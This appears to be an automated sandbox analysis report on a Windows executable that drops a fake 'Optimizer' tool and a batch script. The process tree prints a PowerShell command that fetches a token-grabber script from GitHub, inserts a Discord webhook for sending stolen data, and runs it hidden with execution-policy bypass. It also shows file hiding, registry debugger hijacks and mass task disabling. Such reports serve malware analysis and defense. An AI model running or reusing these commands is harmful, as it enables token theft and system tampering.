1baa5064233eb6e85a66918c21004f1f17fb1821ddf4659eb859beccfc6d298a

Analysis

max time kernel
44s
max time network
48s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
24/04/2024, 20:17

Sharing

Reason

Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-24T20:18:55Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win10v2004-20240412-en/instance_16-dirty.qcow2\"}"

Report Analysis Logs

General

Target

8e5fa02aed0826d0.exe
Size

1.1MB
MD5

e0ca55536a3c4309d87e76a7a3a0803d
SHA1

59a43e50ce59eb8676b7732a226ba99d6006dd33
SHA256

1baa5064233eb6e85a66918c21004f1f17fb1821ddf4659eb859beccfc6d298a
SHA512

13bce5f4dd726c064fd60989b5988ff60e28b1ab960a725daa238c0083f8c9f73bcca90a168c5fac013d00f3f3e5562971d8ddbefcf3cf359cdc1141102ae17a
SSDEEP

24576:i5ZWs+OZVEWry8AFJqPuq/XdaDCIA5KwLkNVVP/VCo:6ZB1G8Yr8Xd2COwLkNDlr

Score

10^/10

discovery persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://canary.discord.com/api/webhooks/1232782007311011870/yxPEfVMJ4WAPSMSj0FeZn8skry9MK1tshvVwuANsXe_GIFxZUYxMJuQnOwnLMCyi-33w

exe.dropper

https://i.postimg.cc/k58gQ03t/PTG.gif

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	3928	powershell.exe

Sets file execution options in registry 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeviceCensus.exe\Debugger = "%windir%\\System32\\taskkill.exe"	Optimizer-16.4(2).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe	Optimizer-16.4(2).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe\Debugger = "%windir%\\System32\\taskkill.exe"	Optimizer-16.4(2).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeviceCensus.exe	Optimizer-16.4(2).exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	Optimizer-16.4(2).exe
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	8e5fa02aed0826d0.exe

Executes dropped EXE 1 IoCs

pid	Process
3612	Optimizer-16.4(2).exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
980	icacls.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3596	timeout.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "132"	LogonUI.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3928	powershell.exe
3928	powershell.exe
3664	powershell.exe
3664	powershell.exe
552	powershell.exe
552	powershell.exe
3612	Optimizer-16.4(2).exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	3612	Optimizer-16.4(2).exe
Token: SeShutdownPrivilege	2132	shutdown.exe
Token: SeRemoteShutdownPrivilege	2132	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1860	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1892 wrote to memory of 2136	1892	8e5fa02aed0826d0.exe	81
PID 1892 wrote to memory of 2136	1892	8e5fa02aed0826d0.exe	81
PID 1892 wrote to memory of 3612	1892	8e5fa02aed0826d0.exe	84
PID 1892 wrote to memory of 3612	1892	8e5fa02aed0826d0.exe	84
PID 2136 wrote to memory of 4628	2136	cmd.exe	85
PID 2136 wrote to memory of 4628	2136	cmd.exe	85
PID 4628 wrote to memory of 1784	4628	net.exe	86
PID 4628 wrote to memory of 1784	4628	net.exe	86
PID 2136 wrote to memory of 3928	2136	cmd.exe	87
PID 2136 wrote to memory of 3928	2136	cmd.exe	87
PID 2136 wrote to memory of 2504	2136	cmd.exe	91
PID 2136 wrote to memory of 2504	2136	cmd.exe	91
PID 2136 wrote to memory of 3664	2136	cmd.exe	92
PID 2136 wrote to memory of 3664	2136	cmd.exe	92
PID 2136 wrote to memory of 552	2136	cmd.exe	93
PID 2136 wrote to memory of 552	2136	cmd.exe	93
PID 552 wrote to memory of 2500	552	powershell.exe	94
PID 552 wrote to memory of 2500	552	powershell.exe	94
PID 2500 wrote to memory of 468	2500	csc.exe	95
PID 2500 wrote to memory of 468	2500	csc.exe	95
PID 2136 wrote to memory of 748	2136	cmd.exe	107
PID 2136 wrote to memory of 748	2136	cmd.exe	107
PID 2136 wrote to memory of 3596	2136	cmd.exe	108
PID 2136 wrote to memory of 3596	2136	cmd.exe	108
PID 3612 wrote to memory of 4364	3612	Optimizer-16.4(2).exe	113
PID 3612 wrote to memory of 4364	3612	Optimizer-16.4(2).exe	113
PID 4364 wrote to memory of 980	4364	cmd.exe	115
PID 4364 wrote to memory of 980	4364	cmd.exe	115
PID 3612 wrote to memory of 1800	3612	Optimizer-16.4(2).exe	116
PID 3612 wrote to memory of 1800	3612	Optimizer-16.4(2).exe	116
PID 1800 wrote to memory of 452	1800	cmd.exe	118
PID 1800 wrote to memory of 452	1800	cmd.exe	118
PID 1800 wrote to memory of 2020	1800	cmd.exe	119
PID 1800 wrote to memory of 2020	1800	cmd.exe	119
PID 1800 wrote to memory of 3688	1800	cmd.exe	120
PID 1800 wrote to memory of 3688	1800	cmd.exe	120
PID 1800 wrote to memory of 3332	1800	cmd.exe	121
PID 1800 wrote to memory of 3332	1800	cmd.exe	121
PID 1800 wrote to memory of 1696	1800	cmd.exe	122
PID 1800 wrote to memory of 1696	1800	cmd.exe	122
PID 1800 wrote to memory of 208	1800	cmd.exe	123
PID 1800 wrote to memory of 208	1800	cmd.exe	123
PID 1800 wrote to memory of 3648	1800	cmd.exe	124
PID 1800 wrote to memory of 3648	1800	cmd.exe	124
PID 1800 wrote to memory of 4300	1800	cmd.exe	125
PID 1800 wrote to memory of 4300	1800	cmd.exe	125
PID 1800 wrote to memory of 4004	1800	cmd.exe	126
PID 1800 wrote to memory of 4004	1800	cmd.exe	126
PID 1800 wrote to memory of 4508	1800	cmd.exe	127
PID 1800 wrote to memory of 4508	1800	cmd.exe	127
PID 1800 wrote to memory of 2204	1800	cmd.exe	128
PID 1800 wrote to memory of 2204	1800	cmd.exe	128
PID 1800 wrote to memory of 4280	1800	cmd.exe	129
PID 1800 wrote to memory of 4280	1800	cmd.exe	129
PID 1800 wrote to memory of 3512	1800	cmd.exe	130
PID 1800 wrote to memory of 3512	1800	cmd.exe	130
PID 1800 wrote to memory of 3404	1800	cmd.exe	131
PID 1800 wrote to memory of 3404	1800	cmd.exe	131
PID 1800 wrote to memory of 340	1800	cmd.exe	132
PID 1800 wrote to memory of 340	1800	cmd.exe	132
PID 1800 wrote to memory of 2332	1800	cmd.exe	133
PID 1800 wrote to memory of 2332	1800	cmd.exe	133
PID 1800 wrote to memory of 732	1800	cmd.exe	134
PID 1800 wrote to memory of 732	1800	cmd.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2504	attrib.exe
748	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8e5fa02aed0826d0.exe
"C:\Users\Admin\AppData\Local\Temp\8e5fa02aed0826d0.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sahm.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:1784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://canary.discord.com/api/webhooks/1232782007311011870/yxPEfVMJ4WAPSMSj0FeZn8skry9MK1tshvVwuANsXe_GIFxZUYxMJuQnOwnLMCyi-33w' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3928
- - C:\Windows\system32\attrib.exe
    attrib +h +s powershell123.ps1
    3⤵
    - Views/modifies file attributes
    PID:2504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:552
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f1ryw1ph\f1ryw1ph.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2500
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES378B.tmp" "c:\Users\Admin\AppData\Local\Temp\f1ryw1ph\CSC7246FEECD06F4BB7B2388EB85B829A98.TMP"
        5⤵
        
        PID:468
- - C:\Windows\system32\attrib.exe
    attrib -h -s powershell123.ps1
    3⤵
    - Views/modifies file attributes
    PID:748
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:3596
- C:\Users\Admin\AppData\Local\Temp\Optimizer-16.4(2).exe
  "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.4(2).exe"
  2⤵
  - Sets file execution options in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C icacls C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger /deny SYSTEM:`(OI`)`(CI`)F
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4364
  - - C:\Windows\system32\icacls.exe
      icacls C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger /deny SYSTEM:`(OI`)`(CI`)F
      4⤵
      Modifies file permissions
      PID:980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Optimizer\Required\DisableTelemetryTasks.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"
      4⤵
      PID:452
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable
      4⤵
      PID:2020
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM"
      4⤵
      PID:3688
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable
      4⤵
      PID:3332
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask"
      4⤵
      PID:1696
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable
      4⤵
      PID:208
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip"
      4⤵
      PID:3648
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable
      4⤵
      PID:4300
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader"
      4⤵
      PID:4004
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable
      4⤵
      PID:4508
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
      4⤵
      PID:2204
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable
      4⤵
      PID:4280
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater"
      4⤵
      PID:3512
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable
      4⤵
      PID:3404
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Application Experience\StartupAppTask"
      4⤵
      PID:340
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Application Experience\StartupAppTask" /disable"
      4⤵
      PID:2332
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"
      4⤵
      PID:732
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable
      4⤵
      PID:2496
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"
      4⤵
      PID:3384
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver" /disable
      4⤵
      PID:4720
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem"
      4⤵
      PID:3944
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
      4⤵
      PID:4144
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor"
      4⤵
      PID:3116
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
      4⤵
      PID:4496
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh"
      4⤵
      PID:3664
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh" /disable
      4⤵
      PID:1664
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyUpload"
      4⤵
      PID:4216
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyUpload" /disable
      4⤵
      PID:3276
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Autochk\Proxy"
      4⤵
      PID:5040
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Autochk\Proxy" /disable
      4⤵
      PID:864
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Maintenance\WinSAT"
      4⤵
      PID:2356
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Maintenance\WinSAT" /disable
      4⤵
      PID:3968
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Application Experience\AitAgent"
      4⤵
      PID:2424
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Application Experience\AitAgent" /disable
      4⤵
      PID:3032
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting"
      4⤵
      PID:1480
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable
      4⤵
      PID:4668
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask"
      4⤵
      PID:4084
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable
      4⤵
      PID:2252
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\DiskFootprint\Diagnostics"
      4⤵
      PID:1060
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\DiskFootprint\Diagnostics" /disable
      4⤵
      PID:868
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)"
      4⤵
      PID:628
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable
      4⤵
      PID:980
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\PI\Sqm-Tasks"
      4⤵
      PID:4248
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\PI\Sqm-Tasks" /disable
      4⤵
      PID:2256
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo"
      4⤵
      PID:2020
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable
      4⤵
      PID:3688
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\AppID\SmartScreenSpecific"
      4⤵
      PID:2772
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\AppID\SmartScreenSpecific" /disable
      4⤵
      PID:372
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /Disable
      4⤵
      PID:208
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "\Microsoft\Windows\Time Synchronization\ForceSynchronizeTime" /Disable
      4⤵
      PID:3648
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "\Microsoft\Windows\Time Synchronization\SynchronizeTime" /Disable
      4⤵
      PID:4300
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\HelloFace\FODCleanupTask"
      4⤵
      PID:4004
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\HelloFace\FODCleanupTask" /disable
      4⤵
      PID:4964
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Feedback\Siuf\DmClient"
      4⤵
      PID:1588
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Feedback\Siuf\DmClient" /disable
      4⤵
      PID:1868
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload"
      4⤵
      PID:2920
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /disable
      4⤵
      PID:1992
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Application Experience\PcaPatchDbTask"
      4⤵
      PID:2184
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Application Experience\PcaPatchDbTask" /disable
      4⤵
      PID:3484
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Device Information\Device"
      4⤵
      PID:860
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Device Information\Device" /disable
      4⤵
      PID:3596
  - - C:\Windows\system32\schtasks.exe
      schtasks /end /tn "\Microsoft\Windows\Device Information\Device User"
      4⤵
      PID:64
  - - C:\Windows\system32\schtasks.exe
      schtasks /change /tn "\Microsoft\Windows\Device Information\Device User" /disable
      4⤵
      PID:872
- - C:\Windows\System32\shutdown.exe
    "C:\Windows\System32\shutdown.exe" /r /t 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2132

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3900855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Optimizer\Optimizer.json

Filesize
2KB

MD5
59d8f428fc976d2fcc51c1a47e44b20f

SHA1
b6afe4fb9fcb34e66c39e35f12e9005bd27d76b0

SHA256
4c967100e8af3126ada7992691e527d54d7eb3b1dbf7b2771c7378e650aeb1b9

SHA512
1ddba4126b92d7ab19b45bd096a06abd18637ce5402baa7469a933097ac3448f76ead229e153f52069f2e042a3abdd08f2e59cdba5275d8aa097e014c6f6a018

Download Submit
C:\ProgramData\Optimizer\Required\DisableTelemetryTasks.bat

Filesize
5KB

MD5
cb03c3144aaff8fb1c3497c403c2b60f

SHA1
ba4380abb20eaaeb638cdb142452def731817212

SHA256
abd9b7c86e9186c4af174c2a630629588ec89a716d3ff04d357d2610e490c8d3

SHA512
d76cf1fa9662bbafc931eb3720213e30a99de34ae0d92ff90a52a761555fc934fc9822c6beeddb882fabf990b30b17e8bf35b8acbc9d9898618d38fc259e9660

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b66db53846de4860ca72a3e59b38c544

SHA1
2202dc88e9cddea92df4f4e8d83930efd98c9c5a

SHA256
b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

SHA512
72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b7955fb76a90e0f22cef807d30931389

SHA1
b0baf94728fa95722bb79fd7e808915a34f325c6

SHA256
b5ccfba6cd331784a1245aef10ac4f15f54c8794a3794e98e9999f235c6908a3

SHA512
62411c96d8870fc02cb27d8f8a117e12f6dd0205980a2948594c7a80e377e82098dd98f0a192c101f9ac5cb993b8540f5a785b2978c20218b6a1b8ad5525c936

Download Submit
C:\Users\Admin\AppData\Local\Temp\Optimizer-16.4(2).exe

Filesize
2.3MB

MD5
9352623ba2fee1206079ce3d81bf0132

SHA1
9c398c2d975d82ba1e46f3bcc0e6298a2b713b8d

SHA256
f4775567ca9941b4fb3224d97b0741ae669eedfcb0d8b3c71106b21bdb1aee28

SHA512
a38cef70819524a3ba8d7583b763da3fac71a9b67e832165f14f60568f7a2a07f67418bb7f7a544b32aa3d76a4fa9a6b142a3998cf362a116171ed4fae05187e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES378B.tmp

Filesize
1KB

MD5
e479de2d3e8e47517e6edcd521fb08cd

SHA1
e5952a38934de916736fed2a1215579227c807d3

SHA256
8d41b0c52930e54b5c316216d32f16076331e60e2a8b7425d71a1c0538f09262

SHA512
d2348d23f3c32bd318dd6efde9b692ed667b485ffc058d0d23dab0d2c4be25e8ed352223c0a4d398078461fa9003646301b8837c57ba0b9ca0020fc4e28c88f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sahm.bat

Filesize
1KB

MD5
28728a7c84ba6cd8506632d84fb66b65

SHA1
0cabb4738f64d8c036fc448bcc4bdefa5a4db2f2

SHA256
ce96a171e1d72fd70cdf1285f71f353cb2f1783bd0115531e1f097799d970228

SHA512
1eaf30d3b22192c76a938508a0229764a6c58bb8822117aa0369e33996cf27304bf0c8af68fe0adb56c656d3b2a35dd33ea11639562bf7e4de2218922f704393

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fudgwtvl.ayv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f1ryw1ph\f1ryw1ph.dll

Filesize
3KB

MD5
e34bbed1031d710cb0b3700678d3fbe5

SHA1
94a82d8c98d79a36aa8cacd8c9fa948c75096fd6

SHA256
9a5cbf46553691acc8dffcd94848d7befd088830a05a5e0166d4d8961cd4d146

SHA512
